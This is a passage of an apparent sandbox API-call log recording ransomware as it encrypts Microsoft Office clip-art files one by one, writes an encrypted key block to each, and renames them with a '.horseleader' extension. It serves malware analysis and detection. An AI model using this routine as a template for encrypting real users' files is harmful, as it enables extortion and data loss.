dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD07804_.WMF", cAlternateFileName="")) returned 1 [0253.189] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="Windows") returned -1 [0253.189] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 67 [0253.189] StrStrIW (lpFirst="BD07804_.WMF", lpSrch=".horseleader") returned 0x0 [0253.189] lstrcmpW (lpString1="BD07804_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.189] lstrcmpW (lpString1="BD07804_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.189] lstrlenW (lpString=".testttjffg") returned 11 [0253.190] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.190] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.190] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 67 [0253.190] StrStrW (lpFirst="BD07804_.WMF", lpSrch=".txt") returned 0x0 [0253.190] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4924) returned 1 [0253.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x133c, lpOverlapped=0x0) returned 1 [0253.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffecc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x133c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x133c, lpOverlapped=0x0) returned 1 [0253.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.193] CloseHandle (hObject=0x158) returned 1 [0253.194] GetProcessHeap () returned 0x780000 [0253.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.194] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.horseleader") returned 79 [0253.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.horseleader")) returned 1 [0253.195] GetProcessHeap () returned 0x780000 [0253.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.195] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD07831_.WMF", cAlternateFileName="")) returned 1 [0253.195] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="Windows") returned -1 [0253.195] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 67 [0253.195] StrStrIW (lpFirst="BD07831_.WMF", lpSrch=".horseleader") returned 0x0 [0253.195] lstrcmpW (lpString1="BD07831_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.195] lstrcmpW (lpString1="BD07831_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.195] lstrlenW (lpString=".testttjffg") returned 11 [0253.195] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.195] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.195] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 67 [0253.197] StrStrW (lpFirst="BD07831_.WMF", lpSrch=".txt") returned 0x0 [0253.197] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4066) returned 1 [0253.197] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xfe2, lpOverlapped=0x0) returned 1 [0253.199] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff01e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.199] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xfe2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xfe2, lpOverlapped=0x0) returned 1 [0253.200] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.200] CloseHandle (hObject=0x158) returned 1 [0253.200] GetProcessHeap () returned 0x780000 [0253.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.200] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.horseleader") returned 79 [0253.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.horseleader")) returned 1 [0253.201] GetProcessHeap () returned 0x780000 [0253.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.201] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08758_.WMF", cAlternateFileName="")) returned 1 [0253.201] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="Windows") returned -1 [0253.202] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 67 [0253.202] StrStrIW (lpFirst="BD08758_.WMF", lpSrch=".horseleader") returned 0x0 [0253.202] lstrcmpW (lpString1="BD08758_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.202] lstrcmpW (lpString1="BD08758_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.202] lstrlenW (lpString=".testttjffg") returned 11 [0253.202] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.202] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.202] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 67 [0253.203] StrStrW (lpFirst="BD08758_.WMF", lpSrch=".txt") returned 0x0 [0253.203] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24320) returned 1 [0253.203] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.207] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.207] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf00, lpOverlapped=0x0) returned 1 [0253.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff100, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.208] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf00, lpOverlapped=0x0) returned 1 [0253.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.208] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.208] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.208] CloseHandle (hObject=0x158) returned 1 [0253.208] GetProcessHeap () returned 0x780000 [0253.208] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.horseleader") returned 79 [0253.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.horseleader")) returned 1 [0253.209] GetProcessHeap () returned 0x780000 [0253.209] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.209] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x60ca, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08773_.WMF", cAlternateFileName="")) returned 1 [0253.210] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="Windows") returned -1 [0253.210] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 67 [0253.210] StrStrIW (lpFirst="BD08773_.WMF", lpSrch=".horseleader") returned 0x0 [0253.210] lstrcmpW (lpString1="BD08773_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.210] lstrcmpW (lpString1="BD08773_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.210] lstrlenW (lpString=".testttjffg") returned 11 [0253.210] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.210] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.210] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.210] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 67 [0253.211] StrStrW (lpFirst="BD08773_.WMF", lpSrch=".txt") returned 0x0 [0253.211] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24778) returned 1 [0253.211] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.214] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.215] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x10ca, lpOverlapped=0x0) returned 1 [0253.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffef36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x10ca, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x10ca, lpOverlapped=0x0) returned 1 [0253.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.216] CloseHandle (hObject=0x158) returned 1 [0253.216] GetProcessHeap () returned 0x780000 [0253.216] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.216] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.horseleader") returned 79 [0253.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.horseleader")) returned 1 [0253.217] GetProcessHeap () returned 0x780000 [0253.217] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.217] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08808_.WMF", cAlternateFileName="")) returned 1 [0253.217] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="Windows") returned -1 [0253.217] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 67 [0253.217] StrStrIW (lpFirst="BD08808_.WMF", lpSrch=".horseleader") returned 0x0 [0253.217] lstrcmpW (lpString1="BD08808_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.217] lstrcmpW (lpString1="BD08808_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.217] lstrlenW (lpString=".testttjffg") returned 11 [0253.217] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.218] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.218] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 67 [0253.218] StrStrW (lpFirst="BD08808_.WMF", lpSrch=".txt") returned 0x0 [0253.218] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=47996) returned 1 [0253.219] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.221] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.221] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.222] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.222] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.223] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b7c, lpOverlapped=0x0) returned 1 [0253.223] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe484, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.223] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b7c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b7c, lpOverlapped=0x0) returned 1 [0253.223] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.223] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.223] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.223] CloseHandle (hObject=0x158) returned 1 [0253.224] GetProcessHeap () returned 0x780000 [0253.224] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.224] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.horseleader") returned 79 [0253.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.horseleader")) returned 1 [0253.225] GetProcessHeap () returned 0x780000 [0253.225] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 